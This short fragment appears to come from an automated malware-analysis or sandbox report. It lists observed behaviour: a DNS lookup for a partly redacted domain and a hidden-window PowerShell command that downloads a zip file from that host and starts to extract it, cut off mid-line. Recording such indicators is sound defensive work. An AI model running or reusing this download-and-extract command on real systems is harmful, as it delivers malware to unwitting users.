Technical Information
- http://lu######-site.etempurl.com/yfg77shbfe8jbv.zip as c:\utjkwsrnrfbc\vnpki9ia.zip
- DNS ASK lu######-site.etempurl.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' (New-Object Net.WebClient).DownloadFile('http://lu######-site.etempurl.com/yfg77shbfe8jbv.zip','C:\utjkwsrnrfbc\VnPkI9Ia.zip');(new-object -com shell.application).namespace('C:\utjkwsrnrfbc').C...' (with hidden window)